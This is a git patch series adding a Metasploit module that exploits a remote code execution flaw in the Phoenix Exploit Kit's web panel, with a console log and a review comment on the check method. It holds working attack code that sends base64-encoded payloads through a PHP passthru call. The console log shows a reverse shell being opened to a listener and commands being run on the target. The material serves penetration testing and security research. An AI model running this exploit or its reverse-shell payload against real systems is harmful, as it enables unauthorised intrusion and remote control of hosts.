From d4c82868de97115deb09bc14a04b086d9b31b579 Mon Sep 17 00:00:00 2001 
From: Jay Turla Date: Fri, 19 Aug 2016 21:29:55 +0800 Subject: [PATCH 1/5] Add Phoenix Exploit Kit Remote Code Execution This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware. ``` msf exploit(phoenix_exec) > show options Module options (exploit/multi/http/phoenix_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.52.128 yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /Phoenix/includes/geoip.php yes The path of geoip.php which is vulnerable to RCE VHOST no HTTP server virtual host Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.52.129 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Phoenix Exploit Kit / Unix msf exploit(phoenix_exec) > check [+] 192.168.52.128:80 The target is vulnerable. msf exploit(phoenix_exec) > exploit [*] Started reverse TCP double handler on 192.168.52.129:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo RZpbBEP77nS8Dvm4; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "RZpbBEP77nS8Dvm4\r\n" [*] Matching... [*] B is input... 
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400 uname -a Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux ```
---
modules/exploits/multi/http/phoenix_exec.rb | 84 +++++++++++++++++++++
1 file changed, 84 insertions(+)
create mode 100644 modules/exploits/multi/http/phoenix_exec.rb
diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb
new file mode 100644
index 0000000000..92469a834d
--- /dev/null
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Phoenix Exploit Kit Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the
+ geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for
+ the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then
+ silently installs malware.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'CrashBandicot @DosPerl', #initial discovery
+ 'Jay Turla <@shipcod3>', #msf module
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '40047' ],
+ [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
+ [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 200,
+ 'BadChars' => '',
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd'
+ }
+ },
+ 'Platform' => %w{ unix win },
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
+ ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
+ ],
+ 'DisclosureDate' => 'Jun 06 2016',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
+ ],self.class)
+ end
+
+ def check
+ test = Rex::Text.rand_text_alpha(8)
+ res = http_send_command("echo #{test};")
+ if res && res.body.include?(test)
+ return Exploit::CheckCode::Vulnerable
+ end
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ encoded = Rex::Text.encode_base64(payload.encoded)
+ http_send_command("passthru(base64_decode(\"#{encoded}\"));")
+ end
+
+ def http_send_command(cmd)
+ send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path),
+ 'vars_get' => {
+ 'bdr' => cmd
+ }
+ })
+ end
+end
From c66ea5ff8f7bf161e3e84e4e3f57904409c45bd5 Mon Sep 17 00:00:00 2001
From: Jay Turla
Date: Fri, 19 Aug 2016 21:47:57 +0800
Subject: [PATCH 2/5] Correcting the date based on the EDB
---
modules/exploits/multi/http/phoenix_exec.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb
index 92469a834d..38ec4368be 100644
--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
 ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
 ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
 ],
- 'DisclosureDate' => 'Jun 06 2016',
+ 'DisclosureDate' => 'July 01 2016',
 'DefaultTarget' => 0))
 
 register_options(
From 5a4f0cf72f7be1ec0d634f2c9f3a56dfc24275df Mon Sep 17 00:00:00 2001
From: Jay Turla
Date: Fri, 19 Aug 2016 21:56:02 +0800
Subject: [PATCH 3/5] run msftidy
---
modules/exploits/multi/http/phoenix_exec.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb
index 38ec4368be..5b7c98f2f4 100644
--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
 ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
 ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
 ],
- 'DisclosureDate' => 'July 01 2016',
+ 'DisclosureDate' => 'Jul 01 2016',
 'DefaultTarget' => 0))
 
 register_options(
From e3d1f8e97bfdefd6da45d7898846fafbf1b70f09 Mon Sep 17 00:00:00 2001
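Review bot: The `check` method can report a target as vulnerable when the page merely reflects the request, because it searches the body for the same random string it sent in the `bdr` parameter — an error page or any reflected-parameter output would satisfy `res.body.include?(test)` without the PHP ever being evaluated. Have the target transform the marker so only real execution yields the expected output, e.g. `res = http_send_command("echo strrev(\"#{test}\");")` followed by `if res && res.body.include?(test.reverse)`. A nil response (connection refused, timeout) also currently falls through to `Exploit::CheckCode::Safe`; returning `Exploit::CheckCode::Unknown` when `res` is nil would avoid labelling an unreachable host as not vulnerable. This hunk holds the entire new file, so none of the definitions are cut off.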
From: Jay Turla
Date: Fri, 19 Aug 2016 22:22:56 +0800
Subject: [PATCH 4/5] Updated the description
---
modules/exploits/multi/http/phoenix_exec.rb | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb
index 5b7c98f2f4..5487340051 100644
--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -14,10 +14,10 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Phoenix Exploit Kit Remote Code Execution',
 'Description' => %q{
- This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the
- geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for
- the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then
- silently installs malware.
+ This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
+ Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
+ presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
+ then silently installs malware.
 },
 'License' => MSF_LICENSE,
 'Author' =>
From ee89b20ab73bc82caa35773ee63c8b64aec1bfbe Mon Sep 17 00:00:00 2001
From: Jay Turla
Date: Fri, 19 Aug 2016 23:49:11 +0800
Subject: [PATCH 5/5] remove 'BadChars'
---
modules/exploits/multi/http/phoenix_exec.rb | 1 -
1 file changed, 1 deletion(-)
diff --git a/modules/exploits/multi/http/phoenix_exec.rb b/modules/exploits/multi/http/phoenix_exec.rb
index 5487340051..5d6d7b9a35 100644
--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -35,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote
 'Payload' =>
 {
 'Space' => 200,
- 'BadChars' => '',
 'DisableNops' => true,
 'Compat' =>
 {